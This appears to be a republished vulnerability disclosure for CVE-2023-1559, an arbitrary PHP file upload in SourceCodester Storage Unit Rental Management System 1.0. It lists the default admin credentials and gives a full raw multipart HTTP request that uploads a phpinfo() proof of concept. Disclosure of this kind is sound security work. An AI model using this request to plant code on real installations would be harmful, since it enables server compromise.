Headline

CVE-2023-1559: bug_report/UPLOAD.md at main · ret2hh/bug_report

A vulnerability classified as problematic was found in SourceCodester Storage Unit Rental Management System 1.0. This vulnerability affects unknown code of the file classes/Users.php?f=save. The manipulation leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-223552.

1 year ago

CVE

Open in Source

#vulnerability #web #windows #apple #php #auth #chrome #webkit

BUG_Author: bit3hh

Vulnerability url: /storage/classes/Users.php?f=save

post form-data parameter ‘filename’ exists arbitrary file upload

Steps to reproduce

1.Go to the admin Dashboard

http://localhost/storage/admin/login.php

Default Admin Access Information

Username: admin / Password: admin123

2.Click on User List and Click on +Create New

3.Any file can be uploaded, such as uploading php code

POST /storage/classes/Users.php?f=save HTTP/1.1
Host: localhost
Content-Length: 782
sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryWEK02qqTsnNh5aIU
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/storage/admin/?page=user/manage_user
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Cookie: PHPSESSID=31osi92l18vkna98judnbogmkg
Connection: close

------WebKitFormBoundaryWEK02qqTsnNh5aIU
Content-Disposition: form-data; name="id"


------WebKitFormBoundaryWEK02qqTsnNh5aIU
Content-Disposition: form-data; name="firstname"

a
------WebKitFormBoundaryWEK02qqTsnNh5aIU
Content-Disposition: form-data; name="lastname"

b
------WebKitFormBoundaryWEK02qqTsnNh5aIU
Content-Disposition: form-data; name="username"

c
------WebKitFormBoundaryWEK02qqTsnNh5aIU
Content-Disposition: form-data; name="password"

d
------WebKitFormBoundaryWEK02qqTsnNh5aIU
Content-Disposition: form-data; name="type"

1
------WebKitFormBoundaryWEK02qqTsnNh5aIU
Content-Disposition: form-data; name="img"; filename="info.php"
Content-Type: application/octet-stream

<?php
phpinfo();
?>
------WebKitFormBoundaryWEK02qqTsnNh5aIU--

4.Access to uploaded files can be executed successfully

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda

11 months ago

11 months ago

11 months ago

11 months ago

11 months ago